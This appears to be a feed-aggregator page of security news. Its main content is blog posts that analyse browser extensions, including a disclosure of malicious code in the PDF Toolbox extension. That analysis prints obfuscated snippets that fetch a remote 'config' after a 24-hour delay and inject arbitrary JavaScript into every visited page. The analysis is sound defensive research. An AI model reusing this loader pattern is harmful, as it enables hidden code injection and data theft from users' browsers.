feeds
by zer0x0ne — on
xkcd
Retrieved title: xkcd.com, 3 item(s)Wikipedia Article Titles
The Six Platonic Solids
Physical Quantities
PortSwigger Research
Retrieved title: PortSwigger Research, 6 item(s)Ambushed by AngularJS: a hidden CSP bypass in Piwik PRO
Any individual website component can undermine the security of the entire site, and analytics platforms are no exception. With this in mind, we decided to do a quick audit of Piwik PRO to make sure it
The curl quirk that exposed Burp Suite & Google Chrome
In this post, we'll explore a little-known feature in curl that led to a local-file disclosure vulnerability in both Burp Suite Pro, and Google Chrome. We patched Burp Suite a while back, but suspect
Exploiting prototype pollution in Node without the filesystem
In this post, we'll introduce a new exploitation technique for Server-Side Prototype Pollution. If you've detected SSPP (maybe using one of our black-box techniques), the next step towards RCE is to f
Server-side prototype pollution: Black-box detection without the DoS
Server-side prototype pollution is hard to detect black-box without causing a DoS. In this post, we introduce a range of safe detection techniques, which we've also implemented in an open source Burp
Top 10 web hacking techniques of 2022
Welcome to the Top 10 Web Hacking Techniques of 2022, the 16th edition of our annual community-powered effort to identify the most important and innovative web security research published in the last
Top 10 web hacking techniques of 2022 - nominations open
Update: Voting is now closed, and the panel vote is in progress. Nominations are now open for the top 10 new web hacking techniques of 2022! Every year, security researchers share their latest f
Dark Reading
Retrieved title: Dark Reading, 6 item(s)Pentagon Leaks Emphasize the Need for a Trusted Workforce
Tightening access controls and security clearance alone won't prevent insider threat risks motivated by lack of trust or loyalty.
Top Cyberattacks Revealed in New Threat Intelligence Report
New report provides actionable intelligence about attacks, threat actors, and campaigns.
2 Lenses for Examining the Safety of Open Source Software
Improving the security of open source repositories and keeping malicious components out requires a combination of technology and people.
130K+ Patients' Social Security Numbers Leaked in UHS of Delaware Data Breach
Tesla Whistleblower Leaks 100GB of Data, Revealing Safety Complaints
Informants have released data that includes thousands of safety complaints the company has received about its self-driving capability, as well as sensitive information regarding current and past employees.
Travel-Themed Phishing, BEC Campaigns Get Smarter as Summer Season Arrives
Phishing campaigns targeting travelers have evolved from simple, easy-to-spot fraud attempts to highly sophisticated operations.
Almost Secure
Retrieved title: Almost Secure, 3 item(s)Malicious code in PDF Toolbox extension
The PDF Toolbox extension for Google Chrome has more than 2 million users and an average rating of 4,2 in the Chrome Web Store. So I was rather surprised to discover obfuscated code in it that has apparently gone unnoticed for at least a year.
The code has been made to look like a legitimate extension API wrapper, merely with some convoluted logic on top. It takes a closer look to recognize unexpected functionality here, and quite some more effort to understand what it is doing.
This code allows serasearchtop[.]com website to inject arbitrary JavaScript code into all websites you visit. While it is impossible for me to tell what this is being used for, the most likely use is injecting ads. More nefarious uses are also possible however.
Contents
What PDF Toolbox does
The functionality of the PDF Toolbox extension is mostly simple. You click the extension icon and get your options:
Clicking any of the options opens a new browser tab with the actual functionality. Here you can select the files and do something with them. Most operations are done locally using the pdf-lib module. Only converting Office documents will upload the file to a web server.
And a regular website could do all of this in exactly the same way. In fact, plenty of such websites already exist. So I suspect that the option to download PDFs only exists to justify both this being a browser extension and requiring wide-reaching privileges.
See, in order to check all your tabs for downloadable PDFs this extension requires access to each and every website. A much more obvious extension design would have been: don’t bother with all tabs, check only the current tab when the extension icon is clicked. After all, people rarely trigger an extension because of some long forgotten tab from a week ago. But that would have been doable with a far less powerful activeTab permission.
While Chrome Web Store requires extension developers not to declare unnecessary permissions, this policy doesn’t seem to be consistently enforced. This extension also requests access to detailed browser tabs information and downloads, but it doesn’t use either.
The “config” file
So all of the extension functionality is contained in the browser action pop-up and the page opening in a new tab. But it still has a background page which, from the look of it, doesn’t do much: it runs Google Analytics and sets the welcome and uninstall page.
This is standard functionality found in some other extensions as well. It seems to be part of the monetization policy: the pages come from ladnet.co and display ads below the actual message, prompting you to install some other browser extensions.
The module called then-chrome is unusual however. It in turn loads a module named api, and the whole thing looks like wrapping the extension APIs similarly to Mozilla’s WebExtension API polyfill. Which would have been slightly more convincing if there were anything actually using the result.
The api module contains the following code:
var Iv = TL ?
"http" + ff + "//s" + qc + "a" + fx + "ar" + document.location.protocol.substring(0, 2) +
(ad ? "to" : ad) + so + "c" + document.location.protocol.substring(3, 5) + "/cf" + Sr :
qB;
let oe = Iv;
oe += bo + (Ua + "fg.") + qB + document.location.protocol.substring(14, 16);
Weird, right? There are all these inline conditionals that don’t do anything other than obfuscating the logic. TL gets document assigned to it, ad gets chrome.runtime as its value – there is no way any of these might be missing.
This is in fact a very convoluted way of constructing a constant string: https://serasearchtop.com/cfg/bahogceckgcanpcoabcdgmoidngedmfo/cfg.json. As the next step the extension calls window.fetch() in order to download this file:
const ax = await window["fet" + document.location.protocol.substring(0, 2)](oe);
if (ax.ok)
{
const rd = await ax.json();
(0, af.wrapObject)(chrome, rd)
}
Calling wrapObject with chrome as first parameter makes the impression that this were some harmless configuration data used to wrap extension APIs. The fact that the developers spent so much effort to obfuscate the address and the downloading tells otherwise however.
Detection prevention
Before I start going through the “wrapper,” there is another piece of logic worth mentioning. Somebody probably thought that the extension making a request to serasearchtop[.]com immediately upon installation would draw suspicions. While it isn’t clear what this domain does or who is behind it, it managed to get onto a bunch of anti-tracking blocking lists.
So rather than making the request immediately, the extension waits 24 hours. This logic is also obfuscated. It looks like this (slightly cleaned up):
const rd = localStorage;
const qJ = "cfg";
const oe = Date.now();
var ax = rd.getItem(qJ);
const PB = 9993592013;
if (ax)
{
const rd = PB - ax
const qJ = oe - rd;
if (qJ < (TL ? 0 : rd) || qJ > (ad ? 87217164 : TC))
{
// Download logic here
}
}
else
{
ax = PB - oe;
rd.setItem(qJ, ax)
}
You can again ignore the inline conditionals: both conditions are always true. The PB constant is only being used to somewhat mess up the timestamp when it is being stored in localStorage.cfg. But qJ becomes the number of milliseconds since the first extension start. And 87217164 is slightly more than the number of milliseconds in 24 hours.
So one only has to change the timestamp in localStorage.cfg for the request to the “configuration” file to happen. For me, only an empty JSON file is being returned however. I suspect that this is another detection prevention mechanism on the server side. There is a cookie being set, so it will likely take some time for me to get a real response here. Maybe there is also some geo-blocking here or other conditions.
The “wrapper”
The wrapper module is where the config processing happens. The logic is again unnecessarily convoluted but it expects a config file like this:
{
"something2.func2": "JSON-stringified parameters",
"something1.func1": "this is ignored"
}
The code relies on Object.entries() implementation in Chrome listing object entries in a particular order. It will take the global scope of the extension’s background page and look up the functions listed in the keys. And it will call them in a very specific way:
something1.func1(x =>
{
something2.func2(x, params2, () =>
{
chrome.runtime.lastError;
});
});
Now I haven’t seen any proper “config” data, so I don’t really know what this is supposed to do. But the callbacks passed in and chrome.runtime.lastError indicate that something1.func1 and something2.func2 are meant to be extension API methods. And given what the extension has access to, it’s either tabs, windows or downloads API.
It took me some time to find a parameter-less API that would call the callback with a value that could be passed to another API call. In the end I realized that the first call is adding a listener. Most likely, something1.func1 is chrome.tabs.onUpdated.addListener. This also explains why chrome.runtime.lastError isn’t being checked for the first call, it is unnecessary when adding a listener.
The tab update listener will be called regularly, and its first parameter is the tab ID. Which can be passed to a number of extension APIs. Given that there is no further logic here, only one call makes sense: chrome.tabs.executeScript. So the wrapper is meant to run code like this:
chrome.tabs.onUpdated.addListener(tabId =>
{
chrome.tabs.executeScript(tabId, {code: "arbitrary JavaScript code"}, () =>
{
chrome.runtime.lastError;
});
});
Effectively, the “config” file downloaded from serasearchtop[.]com can give the extension arbitrary JavaScript code that will be injected into every web page being opened.
What’s the goal?
As I’ve never seen the code being injected, we are now entering the realm of speculations. Most likely, the goal of this code is monetizing the browser extension in ways that are prohibited by the Chrome Web Store policies. Which usually means: injecting ads into websites.
One would expect users to notice however. With the latest PDF Toolbox version being published in January 2022, this has been going on for more than a year. It might have been even longer if previous versions contained this malicious code as well. Yet not one of the two million users complains in an extension review about ads. I can see a number of explanations for that:
- The user numbers have been artificially inflated and the real user count is far lower than two million.
- The functionality is not active, the server gives everyone an empty config file.
- The functionality is only active in some regions, particularly those where people are unlikely to come complain in the Chrome Web Store.
- The code is not injecting ads but rather doing something less obvious.
Concerning the latest bullet point, I see a number of options. A less visible monetization alternative would be injecting cryptocurrency mining code into websites. Maybe it’s that.
Or maybe it’s something that users have almost no chance of detecting: data collection. Maybe the injected code is collecting browsing profiles. Or something more nefarious: it could be collecting online banking credentials and credit card numbers as these are being entered into websites.
Yes, these are pure speculations. It could be anything.
Online Security extension: Destroying privacy for no good reason
These days it’s typical for antivirus vendors to provide you with a browser extension which is meant to improve your online security. I’ll say up front: I don’t consider any such browser extensions recommendable. At best, they are worthless. At worst, they introduce massive security issues.
As an example I took a brief look at the Online Security extension by ReasonLabs. No, there is no actual reason beyond its 7 million users. I think that this extension is a fairly typical representative of its craft.
TL;DR: Most Online Security functionality is already provided by the browser, and there is little indication that it can improve on that. It does implement its functionality in a maximally privacy-unfriendly way however, sharing your browsing history and installed extensions with the vendor. There is also plenty of sloppy programming, some of which might potentially cause issues.
Contents
Features
First I want to take the Online Security features apart one by one. It might come as no surprise, but there is less here than the extension’s description makes it sound like.
URL blocking
The extension description claims:
URL Blocker - Online Security protects you against security breaches that come from browsing suspicious websites. Malware, phishing attempts, crypto-jackers, and scams that can damage both your browser and your device - we track them to keep you and your personal data safe.
If that sounds good, it’s probably because the browser’s built-in protection does such a good job staying in the background. Few people are even aware that it exists. So they will believe antivirus vendors’ claims that they need a third-party product to keep them safe from malicious websites.
Now I cannot really tell how detection quality of Online Security compares to Google Safe Browsing that most browsers rely on. I can comment on the implementation however. While the built-in protection will block malicious websites both at the top level and as frames, Online Security only looks at top-level addresses.
The much bigger issue however is: unlike the browser, Online Security lacks the data to make a decision locally. Instead, it will query ReasonLab’s web server for each and every address you navigate to. The query part of the address will be omitted, in case that makes you feel better.
Here is what a typical request looks like:
POST /SSE/v1/scan/urls.ashx HTTP/1.1
Host: apis.reasonsecurity.com
Cookie: s_id=5c1030de-48ae-4edd-acc3-5d92f4735f96; ruser=3b2653d9-31b9-4ce8-9127-efa0cda53702; aft=…
x-userid: 2362740a-6bba-40d6-8047-898a3b4423d5
Content-Length: 33
Content-Type: application/json
["https://www.google.com/search"]
That’s three user identifiers: two sent as cookies and a third one as x-userid HTTP header. While the former will be reset when the browsing data is cleared, the latter is stored in the extension and will persist for as long as the extension is installed. We’ll see that unique user identifier again.
This request will be sent whenever a new page loads. There is no caching: the extension won’t recognize that it queried the server about the exact same page seconds ago but rather send a new request.
That’s not quite as invasive as what we’ve seen with Avast’s data collection where the context of the page load was being collected as well. Well, at least usually it isn’t. When Online Security performs a scan, be it manual or automated, it will send the addresses of all your tabs to the server:
POST /SSE/v1/scan/urls.ashx HTTP/1.1
Host: apis.reasonsecurity.com
Cookie: s_id=5c1030de-48ae-4edd-acc3-5d92f4735f96; ruser=3b2653d9-31b9-4ce8-9127-efa0cda53702; aft=…
x-userid: 2362740a-6bba-40d6-8047-898a3b4423d5
Content-Length: 335
Content-Type: application/json
[
"https://example.com/",
"chrome://extensions/",
"https://chrome.google.com/webstore/detail/online-security/llbcnfanfmjhpedaedhbcnpgeepdnnok/related",
"https://www.test.de/Geld-anlegen-mit-Zinsen-4209104-0/",
"chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/index.html",
"chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/index.html"
]
Yes, that even includes duplicate addresses. Still, likely no malice is involved here. Yet 17 years after Firefox 2 introduced privacy preserving phishing protection we shouldn’t have to discuss this again.
Protection against malicious websites in modern browsers will typically use local data to check website addresses against. The server will only be queried if there is a match, just in case the data changed in the meantime. And this should really be the baseline privacy level for any security solution today.
What happens to the data?
It’s impossible to tell from the outside what ReasonLab’s servers do with this data. So we have to rely on the information provided in the privacy policy:
We will also collect URLs and the preceding referral domains to check if they are malicious.
Good, they mention collecting this data in unambiguous terms.
In this regard, we will send the URLs to our servers but only store their domains in order to operate and provide the Software services.
So they don’t claim the data to be deleted. They won’t keep the full addresses but they will keep the domain names. This statement leaves some open questions.
Most importantly, the privacy policy doesn’t mention the user identifier at all. If it’s stored along with the domain names, it still allows conclusions about the browsing habits of an individual user. There is also a non-negligible deanonymization potential here.
Also, what kind of services need this data? It’s hard to imagine anything that wouldn’t involve user profiles for advertising.
Extension blocking
Next feature:
Disables Harmful Extensions - Online Security identifies all extensions installed on your browser and disables the harmful ones that may hijack your browser settings.
Yet another piece of functionality that is already built into the browser. However, once again the built-in functionality is so unintrusive that antivirus vendors see a chance to sell you the same functionality.
I’m unsure about the implementation details for Chrome, but Firefox has a local blocklist-addons.json file that it checks all browser extensions against. In case of a match the extension is disabled.
Online Security on the other hand opted for a less privacy-friendly approach: when scanning, it will send the complete list of your installed extensions to the ReasonLab’s server:
POST /SSE/v1/scan/extensions.ashx HTTP/1.1
Host: api.reasonsecurity.com
Cookie: s_id=5c1030de-48ae-4edd-acc3-5d92f4735f96; ruser=3b2653d9-31b9-4ce8-9127-efa0cda53702; aft=…
Content-Length: 141
Content-Type: application/json
[
"kpcjmfjmknbolfjjemmbpnajbiehajac",
"badikkiifpoiichdfhclfkmpeiagfnpa",
"nkdpapfpjjgbfpnombidpiokcmfkfdgn",
"oboonakemofpalcgghocfoadofidjkkk"
]
The privacy policy acknowledges collecting this data but doesn’t tell what happens to it. At least the x-userid header isn’t present, so it’s only cookies identifying the user.
Well, maybe they at least do a better job at blocking malicious extensions than the browser does? After all, Google has been repeatedly criticized for not recognizing malicious extensions in Chrome Web Store.
Yes, but Google will remove and block malicious extensions when notified about them. So the only way of performing better than the built-in functionality is scanning for malicious extensions and keeping quiet about it, thus putting users at risk.
Searching data leaks
Let’s move on to something the browser won’t do:
Dark Web Monitoring - lets you know when your email-related information has become exposed. It will reveal details like passwords, usernames, financial information, and other sensitive details while providing steps to remediate the issue.
This sounds really fancy. What it actually means however: the extension can check whether your email address is present in any known data leaks. It will also use this feature as leverage: you have to register to run the check regularly, and you have to buy the premium version in order to scan multiple email addresses.
It so happens that the well-known website Have I Been Pwned provides the same service for free and without requiring you to register. Again, maybe they aren’t as good? Hard to tell.
But at least when I enter me@mailinator.com into Have I Been Pwned the result cites 99 data breaches and 7 pastes. Doing the same in Online Security yields merely 2 data breaches, which seems to suggest a rather bad data basis.
Interestingly, SpyCloud (which Online Security privacy policy cites as a partner) claims “659 breach exposures” for me@mailinator.com. It won’t tell any details unless you pay them however.
Download monitoring
Now you probably expect that an antivirus vendor will focus on your downloads. And Online Security has you covered:
Monitors Downloads - Online Security seamlessly integrates with RAV Endpoint Protection providing a full and comprehensive protection across your web browser and personal computer.
In other words: you have to install their antivirus, and then the extension will trigger it whenever you download something.
Which, quite frankly, isn’t very impressive. The IAttachmentExecute::Save method has been available as a way to run antivirus applications since Windows XP SP2. Mozilla added support for it with Firefox 3, which was released 15 years ago. Chrome likely supported this from day one. So antivirus software has had a supported way to scan downloads for a very long time. It doesn’t need browser extensions for that.
Cookie and tracker blocking, notification control
And then there are a few more things that pretend to be useful features:
Blocks Cookies and Trackers- Online Security identifies and blocks malicious cookies and trackers that target you with aggressive and hostile advertising. This allows you to keep your browsing experience private and safe.
Notification Control - Online Security blocks notifications from malicious websites and puts the control at your fingertips, so you can easily follow and remove unwanted notifications through the extension dashboard.
Don’t make the wording here confuse you: Online Security is not an ad blocker. It won’t actually block trackers, and it won’t really help you get rid of cookies or notifications.
This entire block of functionality is reserved exclusively to websites that Online Security considers malicious. When it encounters a malicious website (which, in its definition, is restricted to top-level websites), Online Security will delete cookies and browsing data for this website. It will also disable notifications from it.
Now you are probably wondering: what’s the point if malicious websites are blocked anyway? But they aren’t actually blocked. Since Online Security doesn’t have its data available locally, it has to query its webserver to decide whether a website is malicious. By the time it receives a response, the website might have loaded already. So it will be redirected to the extension’s “Blocked website” page.
So this functionality is merely a band-aid for the window of opportunity this extension grants malicious websites to do mischief.
Explicit tracking
Whenever you open some extension page, when you click something in the extension, if you merely sneeze near the extension, it will send a tracking event to track.atom-ds.com. The request looks like this:
POST / HTTP/1.1
Host: track.atom-ds.com
Content-Type: text/plain;charset=UTF-8
Content-Length: 438
{
"auth": "",
"data": "[{
\"clientcreated\":1683711797044,
\"extension_id\":\"llbcnfanfmjhpedaedhbcnpgeepdnnok\",
\"version\":\"3.13.1\",
\"random_number\":902,
\"action\":\"click\",
\"product\":\"rav_extension\",
\"screenid\":\"home_tab\",
\"button\":\"see_more\",
\"screencomponentname\":\"notifications\",
\"status\":\"2_notifications_blocked\",
\"ext_uid\":\"2362740a-6bba-40d6-8047-898a3b4423d5\"
}]",
"table": "digital_solutions_cyber_extensions_ui"
}
The ext_uid field here is the persistent user identifier we’ve seen as x-userid HTTP header before.
Now this kind of tracking might not be unusual. It’s being disclosed in the privacy policy:
(ii) time and date of certain events related to the Software (such as launching and scanning, updating and uninstalling the Software), activity log of your use of the Software and the most used features of the Software
With the supposed purpose:
To provide, support and operate the Software as well as to further develop, enhance and improve our Software and your user experience with our Software.
Of course, it would have been nice for such functionality to be opt-in, but who would object against their favorite browser extension being improved?
Well, it would also have been nice to say that this data is not being stored together with the user identifier. But it probably is, so that ReasonLabs has user profiles containing both browsing history and the user’s extension usage.
I wonder however: who runs the atom-ds.com domain? The privacy policy claims that Google Analytics is being used for monitoring, but this isn’t the Google Analytics domain. Online Security probably used Google Analytics in the past, but it doesn’t right now.
I also doubt that the domain is owned by ReasonLabs. This domain is listed in various tracking protection lists, it must be some company in the business of monitoring users. And ReasonLabs failed listing this third party in their privacy policy.
Code quality issues
None of this means of course that browser extensions created by antivirus vendors cannot be useful. But they tend not to be. Which in my opinion is likely a question of priorities: for an antivirus vendor, their browser extension is never a priority. And so they don’t hire any expertise to develop it.
This lack of expertise is how I explain the common pattern of providing a minimal extension and then escaping into a native application as soon as possible. That’s not what Online Security developers did however, their extension is largely independent of the antivirus product.
The result isn’t exactly instilling confidence however. It has an unused page called newtab.html titled “Chrome Extension Boilerplate (with React 16.6+ & Webpack 4+).” It seems that they used a publicly available extension boilerplate and failed to remove the unnecessary parts. As a result, their extension contains among other things unused files newtab.bundle.js and panel.bundle.js weighting 190 KiB each.
But not only that. It contains its own copy of the Google Analytics script (another 140 KiB), also unused of course. I am fairly certain that copying this script violates Google’s license terms.
There are also more serious issues with the code. For example, there is a hardcoded list with almost 500 domains:
[
"birkiesdipyre.com",
"birlerskababs.com",
…
"hegrem.com",
"hehraybryciyls.com"
].forEach((domain, index) =>
{
chrome.declarativeNetRequest.updateDynamicRules({
addRules: [{
id: index + 1,
priority: 1,
action: {
type: "redirect"
redirect: {
url: chrome.runtime.getURL("/index.html?url=http://"+btoa(domain)+"#/Blocked")
}
},
condition: {
urlFilter: domain,
resourceTypes: ["main_frame"]
}
}]
});
});
It sort of makes sense to block some domains unconditionally, even if ReasonLabs’ server is down. It doesn’t make sense to use only domains starting with letters B to H however. No idea why the full list isn’t used here. It cannot be the package size, as there would have been obvious ways to cut down on this one (see above).
Note also that the condition uses the urlFilter keyword rather than initiatorDomains. So instead of blocking only these domains, they blocked every address where these domain names can be found – which could be e.g. websites writing about these domains.
And the redirect target? They’ve put http:// outside the btoa() call, so the page cannot decode the url parameter and renders blank. It seems that this functionality hasn’t been tested at all.
That’s just the obvious mistakes in a small piece of code. Another typical bug looks like this:
var hostname = new URL(url).hostname.replace("www.", "");
Clearly, the intention is to remove www. prefix at the start of a host name. Instead, this will remove www. anywhere in the host name. So gwww.oogle.com for example becomes google.com.
And that’s a pattern used all over the codebase. It’s used for removing cookies, deleting browsing data, setting site permissions. All of this could potentially be misdirected to an unrelated website.
For example, here is what the notifications settings display after I opened the extension’s “Blocked website” page for gwww.oogle.com:
And here is what the cookie settings show:
Conclusion
As we’ve seen, Online Security provides little to no value compared to functionality built into browsers or available for free. At the same time, it implements its functionality in a massively privacy-invading way. That’s despite better solutions to the problem being available for more than a decade and being widely publicized along with their shortcomings.
At the same time, code quality issues that I noticed in my glimpse of the extension’s source code aren’t exactly confidence instilling. As so often with antivirus vendors, there is little expertise and/or priority developing browser extensions.
If you really want to secure your browsing, it’s advisable to stay away from Online Security and similar products by antivirus vendors. What makes sense is an ad blocker, possibly configured to block trackers as well. And the antivirus better stays outside your browser.
Mind you, Windows Defender is a perfectly capable antivirus starting with Windows 10, and it’s installed by default. There is little reason to install a third-party antivirus application.
A way forward for PfP: Pain-free Passwords
A month ago I announced the end of PfP: Pain-free Passwords. But I’m allowed to change my mind, right? Yes, PfP will be developed further after all. However, it’s so different that I’m publishing it as a new browser extension, not an update to the existing extension.
Rather than using its own data format, PfP 3.x reads and writes KeePass database files. In order for the extension to access these files, users have to install a PfP Native Host application. This application provides access to the configured database files only.
Also, PfP 3.x no longer generates passwords on the fly. All passwords are stored inside the database, and generating passwords randomly happens when passwords are added. While this makes recovery more complicated, elsewhere it simplifies things a lot.
Contents
Why the change of mind?
My original plan was to use KeePassXC, contributing wherever I could see things to improve. However, I noticed that the KeePassXC browser integration is both too dangerous for my taste (exposes too much attack surface to websites) and too limited in its functionality. These issues stem from basic design decisions and cannot be fixed by contributors.
First I decided to ignore the KeePassXC browser extension, instead making a trimmed down version of the PfP user interface to communicate with KeePassXC. This worked, but it was fairly complicated and still very limited. This is a fundamental issue: KeePassXC developers are very worried about malware abusing the browser extension to extract KeePassXC data, so they intentionally limit the functionality available here. Personally, I think that they should be more worried about websites abusing the browser extension – malware will always find other ways.
At this point I realized that I don’t need KeePassXC. A minimal native messaging host application could do the job of providing access to a KeePass database file without making things overly complicated. Thus, PfP Native Host was born.
How is this better than PfP 2.x?
So, I’ve already given up on PfP 2.x development. Why am I publishing PfP 3.x for the wider public then?
The effort of maintaining this solution is smaller. For once, I don’t need to support everything. I don’t need to support Android, there is for example Keepass2Android for that. I don’t need to support binary attachments either, one can use KeePassXC for that. Yes, this is possible the same database, while still using PfP for the basic functionality.
Sync, being a particularly complicated and fragile piece of functionality, is no longer handled by PfP. Instead, it’s delegated to external synchronization clients as usual with KeePass and similar solutions. Yes, no more merging of changes. But way simpler.
And let’s not forget that this release addresses some fundamental design flaws. PfP is no longer a password generator but a conventional password manager. It takes the Argon2 key derivation approach of KeePass databases with strong defaults. And it generates strong random passphrases for new databases by default.
The state of affairs
Last week I pushed out two releases. PfP 3.0 focused primarily on feature parity with PfP 2.x. The few visible improvements like the more flexible import of CSV files, displaying the password list before actually importing it, were largely side-effects of the changed extension base.
A few days later PfP 3.1 came out. This release focused on new functionality: password tags, text size configuration, moving passwords to a different site, warning when filling in passwords on plain HTTP sites. These are largely low-hanging fruit: features that used to be complicated with the old setup but became much simpler with the update.
Now that this is out of the way, pace of development will slow down again of course. As far as I’m concerned, PfP 3.x has left little to be desired. I might look into password sharing again, but with the new concept this feature got even more complicated that it already was. On the other hand, allowing PfP Native Host to run on a web server, providing multiple devices with access to the same database would be fairly trivial – assuming that anyone actually needs this feature.
Trying it out
The download locations for PfP changed, it’s a new browser extension. So it’s now here for Firefox and here for Chromium-based browsers. I want to publish it on Opera Add-ons as well, but their store doesn’t make that easy.
Note that you will also need the PfP Native Host application. While it is self-contained and doesn’t require any privileges, it being unsigned complicates things. I published some installation instructions.
The configuration process of the application should hopefully be self-explaining. You choose an existing database or create a new one, and you choose the browsers which should connect to the application via the native messaging protocol.